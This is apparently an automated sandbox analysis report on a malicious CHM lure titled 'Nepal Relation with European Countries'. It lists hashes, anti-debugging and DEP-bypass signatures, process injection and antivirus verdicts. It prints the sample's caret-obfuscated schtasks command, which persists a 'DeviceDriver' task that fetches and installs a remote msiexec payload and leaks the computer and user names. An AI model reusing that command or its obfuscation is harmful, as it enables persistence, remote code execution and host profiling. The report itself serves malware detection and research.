Summary | ZeroBOX

Nepal Relation with European Countries.chm

AntiVM AntiDebug CHM Format
Category: FILE
Machine: s1_win7_x6401
Started: Aug. 9, 2023, 5:15 p.m.
Completed: Aug. 9, 2023, 5:17 p.m.
Size: 11.0KB
Type: MS Windows HtmlHelp Data
MD5: 86b57b0ec360f45331fc5e4eb5c99611
SHA256: a2e3f464e1c39909f47f0b837b04e1256061f4a9698678e097b4dd09aa4de9c1
CRC32: 343917E6
ssdeep: 96:hnV1ra4uzxuoLllqJhgoKAJGnZaVEZeydYRdi7D:h72Bxx47XGJoy
Yara
  • chm_file_format - chm file format

Hosts (Name / Response / Post-Analysis Lookup): No hosts contacted.

IP Address      Status   Action
164.124.101.2   Active   Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

API: GetComputerNameW
Arguments:
  computer_name: TEST22-PC
Status: 1 | Return: 1 | Repeated: 0
API: WriteConsoleW
Arguments:
  buffer: SUCCESS: The scheduled task "DeviceDriver" has successfully been created.
  console_handle: 0x0000000000000007
Status: 1 | Return: 1 | Repeated: 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
API: GlobalMemoryStatusEx
Arguments: (none)
Status: 1 | Return: 1 | Repeated: 0
API: NtProtectVirtualMemory
Arguments:
  process_identifier: 2760
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 0
  length: 4096
  protection: 64 (PAGE_EXECUTE_READWRITE)
  base_address: 0x000000007304c000
  process_handle: 0xffffffffffffffff
Status: 1 | Return: 0 | Repeated: 0
cmdline "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
cmdline schtasks /create /sc minute /mo 17 /tn DeviceDriver /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^tt^p://dav^eon^ene^wte^stp^ane^l.co^m/^axis^/co^ne.p^hp^?r^ad=%computername%*%username% /^q^n ^/^norestart" /f
API: NtProtectVirtualMemory
Arguments:
  process_identifier: 2760
  stack_dep_bypass: 0
  stack_pivoted: 0
  heap_dep_bypass: 1
  length: 4096
  protection: 32 (PAGE_EXECUTE_READ)
  base_address: 0x000007fffff94000
  process_handle: 0xffffffffffffffff
Status: 1 | Return: 0 | Repeated: 0
Rule                         Description
DebuggerCheck__GlobalFlags   (no description)
DebuggerCheck__QueryInfo     (no description)
DebuggerHiding__Thread       (no description)
DebuggerHiding__Active       (no description)
ThreadControl__Context       (no description)
SEH__vectored                (no description)
anti_dbg                     Checks if being debugged
disable_dep                  Bypass DEP
Process injection: Process 2640 resumed a thread in remote process 2760
API: NtResumeThread
Arguments:
  thread_handle: 0x00000284
  suspend_count: 1
  process_identifier: 2760
Status: 1 | Return: 0 | Repeated: 0
Antivirus               Detection
Lionic                  Trojan.HTML.Generic.4!c
MicroWorld-eScan        Trojan.GenericKD.67693476
FireEye                 Trojan.GenericKD.67693476
CAT-QuickHeal           Trojan.HTML.Bitter.47423
VIPRE                   Trojan.GenericKD.67693476
Sangfor                 Trojan.Generic-Script.Save.aadd533b
Arcabit                 Trojan.Generic.D408EBA4
Cyren                   CHM/ABRisk.ZYUM-7
Symantec                Trojan.Gen.NPE
ESET-NOD32              HTML/TrojanDownloader.Agent.NKU
TrendMicro-HouseCall    Trojan.Win32.FRS.VSNW0EG23
Avast                   Other:Malware-gen [Trj]
Kaspersky               UDS:DangerousObject.Multi.Generic
BitDefender             Trojan.GenericKD.67693476
Tencent                 Win32.Trojan-Downloader.Ader.Eflw
Emsisoft                Trojan.GenericKD.67693476 (B)
DrWeb                   Exploit.ActiveX.23
TrendMicro              Trojan.Win32.FRS.VSNW0EG23
McAfee-GW-Edition       Artemis!Trojan
Microsoft               Trojan:Win32/Leonem
ZoneAlarm               HEUR:Trojan.Script.Generic
GData                   Trojan.GenericKD.67693476
Google                  Detected
AhnLab-V3               Downloader/HTML.Generic.S2220
ALYac                   Trojan.Downloader.CHM
Rising                  Trojan.MouseJack/HTML!1.BE26 (CLASSIC)
MAX                     malware (ai score=100)
Fortinet                HTML/Agent.NKU!tr.dldr
AVG                     Other:Malware-gen [Trj]